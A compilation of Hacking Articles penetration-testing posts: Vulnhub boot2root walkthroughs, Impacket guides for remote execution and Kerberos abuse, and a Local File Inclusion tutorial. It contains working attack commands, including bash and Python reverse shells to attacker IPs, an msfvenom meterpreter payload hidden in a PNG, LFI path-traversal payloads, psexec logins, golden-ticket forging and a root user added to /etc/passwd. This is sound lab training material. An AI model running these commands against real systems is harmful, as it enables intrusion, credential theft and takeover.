Today we’re going to solve another boot2root challenge called “Pandavas”. It’s available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to Hacking Articles. Let’s get started and learn how to break it down successfully.

Level: Not defined

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Snmpwalk
• Dirb
• CeWL
• Bruteforce with Metasploit
• LinEnum

Exploiting

• SSH login
• Dockers Services
• mysqldump

Privilege Escalation

• Abusing SUDO
• Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap -sV -p- 192.168.10.162

Then, we will do a second scan but pay attention, we will add to the command “-sU” to get the UDP services.

This second check for UDP services will take longer, so while nmap is finishing, we will take the opportunity to check the TCP services found.

Enumeration

We start by visiting the web service (port 80), we find several pictures and information about the Pandavas, we check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment)

With the help of Dirb, we will use a big dictionary of words and a short one with more known extensions and we will find a file called “hidden.docx“

We downloaded the “hidden.docx” file:

We open the document, it gives us more details of the history of the “Pandavas”, below we see a clue that will lead us to the first flag.

We copy the text and paste it in nano or another text editor, there the flag will appear by magic.

Now, in the enumeration of UDP services, we detect an SNMP service (port 161), this service is usually misconfigured with a “public” channel where it usually shows confidential information of services and other applications of an organization.

For this we will use the tool “snmpwalk” and there we will find the second flag and a user name of the machine.

snmpwalk -v1 -c public 192.168.10.162 |more

Exploiting

We already have a user, but we are missing the password, I tried a dictionary with the 1000 most used passwords, but our friends from “Hacking Articles” were not going to make it easy for us. So I had to create a custom dictionary using the web service page (remember, port 80).

Once our dictionary is created, we use the “SSH LOGIN” module from Metasploit, we configure it with the user “karna” and with our custom dictionary.

Perfect! So now we connect via SSH and start exploring the inside of the machine.

Once inside, we can list the other two users, we check files and binaries that we have permissions, but it doesn’t work for us.

So we launch another credential listing with the Metasploit bruteforce specifying the user “krishna”.

Great! We authenticate with the user “krishna“:

With this user, we have sudo access to everything, so we could run a reverse shell as sudo, get root privileges, read the root flag and game over… But we’d still be two flags short of completing the challenge!

We listed the machine’s interfaces and found that there is a docker presence in at least three services.

Now we’ll list the docker processes that are running on the machine and we’ll list an FTP service and a MySQL that seem quite interesting.

Start with the FTP service connect:

Go to the “root” folder, find a file called “.ash_history“, read it and get a flag and credentials encoded in Base64.

Decode the string in base64 and get a password.

We will now connect to Docker’s MySQL service:

We’ll break into the database with the credentials “root” and the password “ignite@123“. We will help ourselves with the following command:

mysqldump -A –u root –password=ignite@123 |grep flag

Perfect, we already have the four flags, now we just need to climb privileges as “root” user and read the flag.

Privilege Escalation

There are many ways to get root, I put a terminal with netcat listening on port 4444 and used the following command to raise in my kali a reverse shell as root:

In our kali:

nc -nvlp 4444

On the victim machine:

sudo -u root bash -i >& /dev/tcp/192.168.10.161/4444 0>&1

Now we execute the command in the victim machine and we get a shell as root in our kali.

And now yes, we read our beloved root flag and get the fifth and final flag:

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedIn.

The post HA: Pandavas Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, we are going to discuss how we can connect to Victims machine remotely using Python libraries “Impacket” which you can download from here.

Table of Content

• About Impacket
• atexec.py
• psexec.py
• smbexec.py
• wmiexec.py

About Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.

Packets can be constructed from scratch, as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Atexec.py

Atexec.py: Impacket has a python library that helps an attacker to access the victim host machine remotely through DCE/RPC based protocol used by CIFS hosts to access/control the AT-Scheduler Service and execute the arbitrary system command.

Syntax: Python atexec.py domain/username:password@hostIP command

python atexec.py ignite/administrator:Ignite@987@192.168.1.105 systeminfo

As you can see we have obtained the system information with the help of the above command.

PsExec.py

PSEXEC like functionality example using RemComSvc, with the help of python script we can use this module for connecting host machine remotely thus you need to execute following command.

Syntax: Python psexec.py domain/username:password@hostIP

python psexec.py ignite/administrator:Ignite@987@192.168.1.105

As you can see we have obtained the system shell with the help of the above command.

Smbexec.py

Smbexec.py uses a similar approach to psexec w/o using RemComSvc. This script works in two ways:

• share mode: you specify a share, and everything is done through that share.
• server mode: if for any reason there’s no share available, this script will launch a local SMB server, so the output of the commands executed is sent back by the target machine into a locally shared folder. Keep in mind you would need root access to bind to port 445 in the local machine.

Syntax: Python smbexec.py domain/username:password@hostIP

python smbexec.py ignite/administrator:Ignite@987@192.168.1.105

As you can see we have obtained the system shell with the help of the above command.

wmiexec.py

A similar approach to smbexec but executing commands through WMI. The main advantage here is it runs under the user (has to be Admin) account, not SYSTEM, plus, it doesn’t generate noisy messages in the event log that smbexec.py does when creating a service. The drawback is it needs DCOM, hence, I have to be able to access DCOM ports at the target machine.

Syntax: Python wmiexec.py domain/username:password@hostIP

python wmiexec.py ignite/administrator:Ignite@987@192.168.1.105 dir

As you can see we have obtained the system information with the help of the above command.

The post Remote Code Execution Using Impacket appeared first on Hacking Articles.

In this post, we are going to discuss how we can abuse Kerberos protocol remotely using Python libraries “Impacket” for conducting the lateral movement attack. You can download from here.

Table of Content

• GetNPUSERs.py
• GetUserSPN.py
• Ticketer.py
• TickerCovertor.py
• GetTGT.py
• GetADUser.py

About Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.

Packets can be constructed from scratch, as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

GetNPUSers.py

This script will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.

python GetNPUsers.py -dc-ip 192.168.1.105 ignite.local/ -usersfile users -format john -outputfile hashes

As a result, the attacker will able to obtain the NTLM Hashes inside the output file Hashes and with the help of John the ripper he can go for password cracking as done here.

john --wordlist=/usr/share/wordlists/rockyou.txt hahses

This script is useful for abusing Kerberos against AS-REP Roasting attack.

GetUSERSPN.py

This module will try to find Service Principal Names that are associated with a normal user account. Since normal account’s password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline brute-forcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.

python GetUserSPNs.py -request -dc-ip 192.168.1.105 ignite.local/yashika

Ticketer.py

This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, extrasids, etc.

This will generate the ticket into ccache format which can be converted further into kirbi.

python ticketer.py -nthash f3bc61e97fb14d18c42bcbf6c3a9055f -domain-sid S-1-5-21-3523557010-2506964455-2614950430 -domain ignite.local raj

This script can be helpful for abusing Kerberos against GOLDEN TICKET ATTACK.

TicketConverter.py

This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket, and vice versa. As you can observe that the above script helps in generating the ccache file and with the of this script we can convert into kirbi.

python ticketConverter.py raj.ccache ticket.kirbi

GetTGT.py

This python script will request a TGT and save it as ccache for given a password, hash or aesKey. That we can be injected directory for access the requested service.

we have used getTGT to generate the ccache and used KERB5CCNAME pass the ccache file for the requested service. This is completely remote attack without using a local system of the compromised victim, but you need to compromise NTLM hashes for that, type following to conduct pass the ccache attack remotely.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

And as result by injecting the ticket we have accessed the domain controller shell.

This script is useful in following attacks for abusing Kerberos:

• Kerberoasting and Pass the Ticket Attack Using Linux
• Lateral Movement: Pass the Cache
• Lateral Movement: Over Pass the Hash

GetADUser.py

This script will gather data about the domain’s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes. If no entries are returned that means users don’t have email addresses specified. If so, you can use the -all-users parameter.

GetADUSers.py -all ignite.local/Administrator:Ignite@987 -dc-ip 192.168.1.105

As a result, it has dumped all username of the Activity Directory as shown in the image.

The post Abusing Kerberos Using Impacket appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “Glasgow Smile”. It’s available at Vulnhub for penetration testing. This lab is an intermediate level. The credit for making this lab goes to mindsflee. Let’s get started and learn how to break it down successfully.

Level: Intermediate

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Gobuster
• Joomscan
• CyberChef

Exploiting

• CeWL
• Brute force Joomla login with Burp
• Credential theft from the database

Privilege Escalation

• Pspy
• Abuse of crontab tasks

• Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap -A -p- 192.168.10.162

Enumeration

We start by visiting the web service (port 80), we find the image of the “Joker”, we check the source code and the robot.txt file, it seems that there is nothing useful.

With the help of Gobuster and the “big” dictionary (default in kali), we found the Joomla CMS deployed on the server:

We access the site and show the Joomla site with only one post on it, where there is a dialogue of two scenes from the film of the “Joker“

It’s time to use “joomscan” and list version, interesting directories, backup files or something that can help us identify some vulnerability.

To work more comfortably, I always recommend that you modify the /etc/hosts/ with the name of the machine. In many cases, this host will be shown to you in the site’s own source code. (Although this step is not necessary on this machine)

Exploiting

We run CeWL to create a custom dictionary using the words from the Joker/Arthur dialogue posted in Joomla.

We capture with Burp a request of the authentication request and take it to the “intruder” and introduce the dictionary we just created.” (You have a good tutorial about Bruteforce login with Burp here)

We start the attack, filter through “Lenght” and find a single line where its value is different. There are our credentials!

We check our credentials in the Joomla administration panel, we see that we are in as “Super Admin (Joker)“.

Our site step will be to get up a reverse shell or webshell in order to have visibility inside the server.

To do this, I didn’t get complicated, I directly modified the file “index.php” and put the code of the webshell of “pentestmonkey“.

Great! Now, we’ll put a listening netcat on port 5555 and run the command to create a reverse shell.

We run the path of the “index.php“:

If everything went well, we will have a reverse shell with the user “www-data”.

We execute the following commands to get an interactive shell. Once inside, we read the “Joomla” configuration file and get the credentials from the database. (There are always interesting things in the databases :D)

Privilege Escalation (user “rob”)

We logged on to the database, from the “batjoke” database and we will query the “taskforce” table. We make a query and see that there are several users with their passwords encoded in base64, we will only keep the user “rob“.

We decode the password from our kali and get the credentials in plain text.

We test the credentials from the SSH service and log in with the user “rob” And we can read the first flag:

Privilege Escalation (user “Abner”)

Inside the “home” of the user “rob” we find the file “Abnerineedyourhelp“. We read it and we will have the clue to get the credentials of the next user.

With the help of the “Cyberchef” website and the “rot13” module. We will be modifying the value until we get the readable text.

We repeat the previous formula, decode the password in base64 and obtain the password of the user “abner“.

We authenticate ourselves as the new user and with it, the next flag:

Privilege Escalation (user “Penguin”)

It is probably the most complicated user to get, since I focused on scaling user privileges, without finishing listing everything that was in the different folders of Joomla. For example, this hidden zip:

Download and unzip the .zip file using the user’s password “abner” (remember: I33hope99my0death000makes44more8cents00than0my0life0)

We read the file and obtain the credentials of the user “penguin“.

We authenticate with the new user “penguin” and we read the flag located in his “home“:

Privilege Escalation (root)

After getting to climb over the three users, now it’s time to get the desired “root”.

We read the file “PeopleAreStartingToNotice” (Make some coffee, you’ll need it! xD)

The Joker tells us that it is developing a program (binary find) and that it can only be executed with root permissions… Well, I’m going to save you time, since this binary is useless xD

We focus on the hidden file “.trash_old“.

I gave it a lot of thought, this “Joker” was playing with me and I didn’t know where to climb, until Pspy gave me the answer…

With this, it was already easy, we would only have to modify the file and add our line with a reverse python shell.

$ python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.10.155”,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

We put a listening netcat on our kali at port 8888:

We wait a few minutes and see how the script runs in crontab:

And if all goes well, we’ll have a shell as root in our kali:

Perfect! Now, all we have to do is read the root flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn.

The post Glasgow Smile: 1.1 Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “GitRoot: 1”. It’s available at Vulnhub for penetration testing. This lab is an intermediate level and is based on Git. The credit for making this lab goes to RecursiveNULL. Let’s get started and learn how to successfully break it down.

Level: Intermediate

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Gobuster
• GitTools

Exploiting

• Bruteforce SSH with Hydra

Privilege Escalation

• Linpeas
• Abuse Git Hooks
• Abuse SUDO

Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap -A -p- 192.168.10.162

Enumeration

We access the website, it tells us that the site is hosted in the subdomain “wp.gitroot.vuln“.

We added the subdomain to our “/etc/hosts” file.

We access the address of the subdomain and see that WordPress is displayed.

After trying to break the WP without success, I try to list more subdomains with the option “vhost” of the Gobuster tool and the “big.txt” dictionary that comes with Kali by default.

We put this subdomain in our list of hosts

We access the new subdomain and find a code storage service, so it looks great.

We will use Gobuster again, this time to merge directories and files within this subdomain.

With GitDumper from the GitTools toolkit, we extract all the contents of “/.git/” into our Kali

./gitdumper.sh http://repo.gitroot.vuln/.git/ /root/GitRoot/git-tmp/

He’ll list an assortment of files, but we’ll keep this one:

We have two interesting files, well, actually we only have one, the “pablo_HELP.txt” file has been deleted, but we will rescue it!

Contents of the new file:

Now, we’ll recover all the files with the GitTools Kit Extractor tool (including “pablo_HELP“)

Contents of the “pablo_HELP” file

Nothing useful, we continue to check the .php files, we found some credentials in the file “set.php“.

Exploiting

We used the credentials in both WordPress and SSH, but without success. Although we already know the names of the users, we carried out a brute force attack on the SSH service with the “rockyou” dictionary.

With the credentials obtained, we access through SSH with the user “pablo” and read the flag of user.txt.

Privilege Escalation (user “beth”)

We keep listing the contents of “Pablo” folder, we find a folder called “public“, inside it, we have a message inviting us to check out a new git repository.

We run “linpeas.sh” and it lists a git repository from user “beth”, so it looks like we found the new repository.

We went into the heads directory of the git logs and found a large list, but if we sort them by size we’ll see that there’s one that’s larger than the rest.

We read the file and show the content of the “add some stuff” commit, we’ll get “Beth” password inside the script.

Privilege Escalation (user “jen”)

We authenticate ourselves as “beth” with the previously obtained password, read the content and see that we have a message from the user “jen“. In it, he asks us to leave a .zip in the folder he indicates, this user will be responsible for decompressing it.

Well, let’s surprise him with a .zip containing a reverse shell con la ayuda de “hooks” en git.

We will create a “post-commit” file and put a reverse shell with python. We will give you all the necessary permissions, we will compress it with 7zip and copy it to the path where “jen” indicated.

In our Kali, we will maintain a connection to netcat by listening on port 9999 while waiting for the script to run.

After having a shell with the user “jen“, we will read the file “.viminfo” and we will obtain his password.

Privilege Escalation (root)

With the user’s password “jen” in our possession, we run the command “sudo -l” and see that we have permissions to the “git” binary, of which there are several methods for escalating privileges over it, we’ll use the command “$ sudo git -p help config”.

At the bottom, it will allow us to execute commands, type “!/bin/sh“, get the root prompt and read the flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn.

The post GitRoot: 1 Vulnhub Walkthrough appeared first on Hacking Articles.

In this deep down online world, dynamic web-applications are the ones that can easily be breached by an attacker due to their loosely written server-side codes and misconfigured system files. Today, we will learn about File Inclusion, which is considered as one of the most critical vulnerability that somewhere allows an attacker to manipulate the target’s web server by including malicious files remotely or even access sensitive files present onto that server.

Table of Content

• Introduction
• PHP Functions
  • Include() function
  • Require() function
  • Require-once() function
• Local File Inclusion
• LFI Exploitation
  • Basic LFI Attack
  • Null byte Attack
  • Base64 Attack
  • Fuzzing Attack
  • LFI Suite
  • LFI over File UPload
• Mitigation

Introduction

File Inclusion vulnerabilities are commonly found in poorly written PHP web-applications where the input parameters are not properly sanitized or validated. Therefore it becomes easy for an attacker to capture the passing HTTP Requests, manipulates the URL parameter that accepts a filename and include the malicious files in the web-server.

In order to understand the mechanism, let’s take a look at this scenario.

Consider a web-application that accepts a parameter that says “file=hackingarticles.php” via its URL, the server further processes it and displays its content on the application’s screen.

Now the attacker tries to manipulate the filename parameter and calls up a local file or even injects a malicious script or a payload calling it from his own website into that parameter, thus the web-server will process it and executes that particular file which might lead to the following attacks:

• Code execution on the Web server
• Cross-Site Scripting Attacks (XSS)
• Denial of service (DOS)
• Data Manipulation Attacks
• Sensitive Information Disclosure

The impact of this vulnerability is quite high and has therefore been reported under-

1. CWE-98: “Improper Control of Filename for Include/Require Statement in PHP Program”
2. CWE-20: “Improper Input Validation”
3. CWE-22: “Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)”
4. CWE-23: “Relative Path Traversal”
5. CWE-200: “Exposure of Sensitive Information to an Unauthorized Actor”

The File Inclusion attacks are of two types:

1. Local File Inclusion (LFI)
2. Remote File Inclusion (RFI)

Before we get into the depth of these file inclusion attacks, let’s have a look at some of the PHP functions.

PHP Include() Function

We can insert the content of one PHP file into another PHP file before the server executes it, with the include() function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help the developers to make it easy to change the layout of a complete website with minimal effort i.e. if there is any change required then instead of changing thousands of files just change the included PHP file.

Example 1

Assume we have a standard footer file called “footer.php“, that looks like this

<?php
echo "<p>Copyright &copy; 2010-" . date("Y") ."hackingartices.in</p>";
?>

To include the footer file on our page, we’ll be using the include statement.

<html>
<body>
<h1>Welcome to Hacking Articles</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include 'footer.php';?>
</body>
</html>

The code within the included file (footer.php) is interpreted just as if it had been inserted into the main page.

Example 2

Assume we have a file called “vars.php“, with some variables defined:

?php
$color='red';
$car='BMW';
?>

Test.php

<html>
<body>
<h1>Welcome to my Home Page!!</h1>
<?php
echo "A$color$car";  //Output A
include 'var.php';
echo "A$color$car";  //A red BMW
?>
</body>
</html>

As soon as the fifth line executes in the test.php file, just “A” will be printed out because we haven’t called our var.php script yet. Whereas in the next line, we have used the include function to include the var.php file, as soon as the interpreter reads this line it directly calls our file from the server and executes it.

Therefore the variables “colour” and “car” are now assigned with “red” and “BMW”. As the last line runs, we’ll get the output as “A red BMW”.

PHP Require() Function

Similar to the include() function, the require statement is also used to include a file into the PHP code. However, there is a one big difference between include and require functions. When a file is included with the include statement and PHP cannot find it or load it properly, thus the include() function generates a warning but the script will continue to execute:

Example 3

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

Output: I have a Red BMW

Now if we try to run the same code using the require function, the echo statement will not be executed because the script execution dies as soon as the require statement return a fatal error:

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php require 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>

No output result.

PHP Require_once() Function

We can use the Require_once() function to access the data of another page into our page but only once. It works in a similar way as the require() function do. The only difference between require and require_once is that, if it is found that the file has already been included in the page, then the calling script is going to ignore further inclusions.

Example 4

echo.php

<?php
echo "Hello";
?>

Test.php

<?php
require('echo.php');
require_once('echo.php');
?>

Output: “Hello”

Note

allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled

You can enable allow_url_include from php.ini by running the following commands :

nano /etc/php/7.2/apache2/php.ini
allow_url_include = On

Local File Inclusion (LFI)

Local file inclusion is the vulnerability in which an attacker tries to trick the web-application by including the files that are already present locally into the server. It arises when a php file contains some php functions such as “include”, “include_once”, “require”, “require_once”.

This vulnerability occurs, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Thus, the local file inclusion has “High Severity with a CVSS Score of 8.1”

Let’s try to exploit this LFI vulnerability through all the different ways we can, I have used two different platforms bWAPP and DVWA which contains the file inclusion vulnerability.

Basic Local file inclusion

We’ll open the target IP in our browser and login inside BWAPP as a bee : bug, further we will set the “choose your bug” option to Remote & Local File Inclusion (RFI/LFI) and hit hack, even for this time we’ll keep our security level to “low”.

Now, we’ll be redirected to the web page which is basically suffering from RFI & LFI Vulnerability. There we will find a comment section to select a language from the given drop-down list, as soon as we click on go button, the selected language file gets included into the URL.

In order to perform the basic LFI attack, we’ll be manipulating the “URL language parameter” with “/etc/passwd” to access the password file present in the local system as:

192.168.0.11/bWAPP/rlfi.php?language=/etc/passwd

So we’ve successfully get into the password file and we are able to read this sensitive information directly from the webpage. Similarly we can even read the contents of the other files using “/etc/shadow” or “/etc/group”

Null byte

In many scenarios, the basic local file inclusion attack might not work, due to the high-security configurations. From the below image you can observe that, I got failed to read the password file when executing the same path in the URL.

So what should we do when we got stuck in some similar situations?

The answer is to go for the Null Byte Attack. Many developers add up a ‘.php’ extension into their codes at the end of the required variable before it gets included.

Therefore the webserver is interpreting /etc/passwd as /etc/passwd.php, thus we are not able to access the file. In order to get rid of this .php we try to terminate the variable using the null byte character (%00) that will force the php server to ignore everything after that, as soon as it is interpreted.

192.168.0.11/bWAPP/rlfi.php?language=/etc/passwd%00

Great, we are back!! We can read the contents of the password file again.

You can even grab the same using burpsuite, by simply capturing the browser’s request in the proxy tab, manipulating its URL with /etc/passwd%00 and forwarding it all to the repeater. Inside repeater, we can do a deep analysis of the sent requests and responses generated through it.

Now we just need to click on the go tab. And on the right side of the window, you can see that the password file is opened as a response.

Base64 encoded

Sometimes the security configuration is much high and we’re unable to view the contents of the included PHP file. Thus we can still exploit the LFI vulnerability by just using the following PHP function.

192.168.0.11/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

Therefore from the below screenshot you can determine that the contents of the password file is encoded in base64. Copy the whole encoded text and try to decode it with any base64 decoder.

I’ve used the burpsuite decoder in order to decode the above-copied text.

Go to the Decoder option in burpsuite and paste the copied base64 text into the field provided, now on the right-hand side click on decode as and choose Base64 from the options presented.

And here we go, you can see that we have successfully grabbed the password file again.

Fuzzing

Many times it is not possible to check for all these scenarios manually, and even sometimes our included file might not be there in the root directory. Thus in order to deface the website through the LFI vulnerability, we need to traverse back and find the actual path to that included file. This traversing can contain a lot of permutation and combinations, therefore we’ll make a dictionary with all the possible conditions and will simply include it in our attack.

From the below screenshot, you can see that I’ve send the intercepted request to the intruder with a simple right-click in the proxy tab and further selecting the send to intruder option.

Now we need to load our dictionary file into the payload section and set the payload type to Simple list as highlighted in the below image.

So, we are almost done, we just need to set the payload position to our input value parameter and simply fire the “Start Attack” button to launch our fuzzing attack.

From the below image we can see that our attack has been started and there is a fluctuation in the length section. As soon as we find any increment in any of the supplied input condition, we’ll check its response to reading the contents of the included file.

LFI Suite

Sometimes it becomes a bit frustrating while performing the LFI attack using Burp suite, i.e. wait for the incremented length and check for every possible response it shows. In order to make this task somewhat simpler and faster, we’ll be using an amazing automated tool called LFI Suite. This helps us to scan the web site’s URL and if found vulnerable, it displays all the possible results, therefore we can use it to gain the website’s remote shell. You can download this from here.

Firstly we’ll clone the LFI suite and boot it up in our kali machine using the following code:

git clone https://github.com/D35m0nd142/LFISuite.git
cd LFISuite
python lfisuite.py

Choose the 2^nd option as “Scanner” in order to check the possible input parameters.

Now it ask us to “enter the cookies”, I’ve installed the “HTTP Header live” plugin to capture the HTTP passing requests.

From the below image you can see that I’ve copied the captured cookies into the cookies field and disable the Tor proxy. We just need to enter the website’s URL and hit enter.

Now the attack has been started and we can see that there are 40 different parameters through we can exploit the LFI vulnerability into our web-application.

Now it’s time to connect to the victim and deface the website by capturing its remote shell.

Restart the application and this time choose option 1 as “Exploiter”. Enter the required fields with the same cookies that we’ve used in the scanner section and set the Tor proxy to “No”.

 As soon as you hit enter, you’ll find a list with multiple ways to attack the webserver.

Select the option 9 as “Auto Hack”.

A new section will pop-up asking for the web site’s URL, here enter the target website and hit enter.

http://192.168.0.11/bWAPP/rlfi.php?language=

Cool!! We’ve successfully captured the victim’s command shell.

LFI over File Upload

As we all are aware with the File Upload vulnerability, that it allows an attacker to upload a file with the malicious code in it, which can be executed on the server. You can learn more about this vulnerability from here.

But what, if the web-server is patched with the file upload vulnerability using high security?

Not a big issue. We just need an unpatched file inclusion vulnerability into that, therefore we can bypass its high security through the file inclusion vulnerability and even get the reverse connection of victim’s server.

Let’s check it out how.

Firstly I’ve downloaded an image raj.png and saved it on my desktop.

Now I’ll open the terminal and type following command to generate a malicious PHP code inside “raj.png” image.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=4444 >> /home/hackingarticles/Desktop/raj.png

Let’s verify whether our injected code is in the image or not.

cat /home/hackingarticles/Desktop/raj.png

At the bottom, you will find that the image is having the PHP code in it. This means that our malicious image is ready, and we are now able to upload it over the web application.

Now explore the target’s IP in browser and login into DVWA with security level high. Choose the vulnerability as a file upload in order to upload the malicious image into the web-applications server.

From the given screenshot, you can see “raj.png” image is successfully uploaded.

Copy the highlighted path where the image is uploaded.

Before executing the image, we’ll boot the Metasploit framework inside the Kali Linux and start-up multi/handler.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.9
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Now we’ll get back to DVWA and set security level low and will turn on the File Inclusion vulnerability. This time we will again manipulate the URL parameter “page=” by pasting the above-copied path of uploaded image.

192.168.0.11/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/raj.png

As soon as the URL loads up into the browser, we will get the reverse connection of the server in our Kali machine.

Mitigations to File Inclusion Attacks

1. In order to prevent our website from the file inclusion attacks, we need to use the strong input validations i.e. rather allow any file to be included in our web-application we should restrict our input parameter to accept a whitelist of acceptable files and reject all the other inputs that do not strictly conform to specifications.

We can examine this all with the following code snippet.

From the above image you can see that, there is an if condition, which is only allowing the whitelisted files and replaying all the other files with “ERROR: File not Found!”

2. Exclude the directory separators “/” to prevent our web-application from the directory traversal attack which may further lead to the Local File Inclusion attacks.
3. Develop or run the code in the most recent version of the PHP server which is available. And even configure the PHP applications so that it does not use register_globals.

Source: https://www.w3schools.com/ 

               https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

               https://www.acunetix.com

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Comprehensive Guide to Local File Inclusion (LFI) appeared first on Hacking Articles.

Today, I am going to share a writeup for the boot2root challenge of the vulnhub machine “Tre:1”. It is made by SunCSR team difficulty level of this machine is the intermediate level. And for this machine goal is to read the root shell.

Download it from here: https://www.vulnhub.com/entry/tre-1,483/

Table of Content

Recon

• Netdiscover
• Nmap
• dirb

Exploitation

• Adminer exploit
• ssh login
• Exploitable writable file

Privilege Escalation

• Abusing /etc/passwd

Walkthrough

Recon

Let’s start recon for this machine using Netdiscover, It is used for identifying the IP address of the various machines in our network work It works as traceroute.

netdiscover

As we got our target IP address for the machine (192.168.1.104), Next, we use nmap for the port scanning and further information gathering on the target host.

nmap -A 192.168.1.104

Since port 80 is open, Let’s explore the domain or webpage on this target IP address using a web browser.

We will also perform fuzzing to find the endpoints using the dirbuster tool with the big.txt wordlist which can be located inside /usr/share/wordlists directory using some extensions like php,html.

dirb http://192.168.1.104/ /usr/share/wordlists/dirb/big.txt -X .html,.php,.txt

We got some extensions like adminer.php, index.html, info.php. After checking all the extensions we got login page on the http://192.168.1.104/adminer.php

In the above login page, we need to escalate for the credentials. I have tried many login bypasses that didn’t work for this page. Now again we will try to brute force directories in hope of config file for this login page.

dirb http://192.168.1.104/ /usr/share/wordlists/dirb/big.txt

After scanning and checking all the directories we got one directory /mantisbt/config in which will check for the credentials.

we got the credentials for the login page in the a.txt which was present in the directory /mantisbt/config.

Got the credentials that we want to use for the login of adminer login page.

username: mantissuser
password: password@123AS
database: mantis

Using the above credentials, we got logged in.

Exploitation

We fill out all the information that we found earlier in the a.txt file and using those credentials we are successfully inside the panel.  Then we try to read the data of the table mantis_user_table and found 2 users here and with their password.

We tried to login with the first user admin panel but was not able to upload any file. Now if we focus on the second user “tre” and the real name looks like giving us a hint towards ssh login, so we used the tre as username and Tr3@123456A! as password.

First of all, we checked for the user privileges using the command sudo -l.

ssh tre@192.168.1.104
Password: Tr3@123456A!
sudo -l

As per sudo permission the user can run showdown command as privilege user. Further we download the linEnum script to check for further enumeration.

Now let’s run linEnum script binary output on the other terminal.

We did check the permissions of the /usr/bin/check-system.

ls -la check-system

As the above file is having the permissions of the read-write as a user, edited this file using nano editor. And given SUID permissions for the nano file but /usr/bin/check-system will update the changes when the systems will reboot.

chmod +s /usr/bin/nano

In the above step, we changed the privileges for the nano file. Now will use the /sbin/shutdown.

sudo shutdown -r now

Here -r flag is used for the restart of the host system. Again will check for the permission of the nano file system and notice the SUID permission is enabled now. J

Hence, now I can try to modify the passwd file for privilege Escalation.

ls -la /usr/bin/nano

Privilege Escalation

In a new terminal, we are using OpenSSL to make a new salted combined username and password in MD5 algorithm. For this, the command used is

openssl passwd -1 -salt user3 pass123

Now using nono /etc/passwd command we are editing the passwd directory for adding a new user. The for the new user is username: Salted Value of username and password:0:0:root:/root:/bin/bash

Now we simply check if the user has been successfully added or not, so as to find them. For this, we have used su -raj command and in the password, we have given the password for this user which is pass123.

tail -n 2 /etc/passwd
su raj
Password: pass123
cd /root
ls
cat root.txt

